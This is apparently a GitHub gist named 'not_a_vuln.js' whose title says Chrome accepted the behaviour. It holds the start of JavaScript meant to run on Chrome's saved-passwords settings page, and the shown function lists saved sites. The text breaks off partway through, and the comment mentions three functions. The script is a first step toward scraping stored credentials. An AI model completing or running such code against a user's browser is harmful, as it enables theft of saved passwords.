Skip to content

Instantly share code, notes, and snippets.

View RoxyBoxxy's full-sized avatar
💥
I've got a idea ~ JunkRat Overwatch

Rox Squires RoxyBoxxy

💥
I've got a idea ~ JunkRat Overwatch
View GitHub Profile
@LandonPowell
LandonPowell / not_a_vuln.js
Created February 20, 2017 00:47
Chrome Said This Was Okay
/*
Using these three functions, start in chrome://settings/passwords
*/
function listSites() {
var listOfSites = document.getElementById("saved-passwords-list").children;
var list = [];
for (var i = 0; i < listOfSites.length; i++) {
if (listOfSites[i].className != "spacer")
list.push(listOfSites[i].children[0].children[0].title);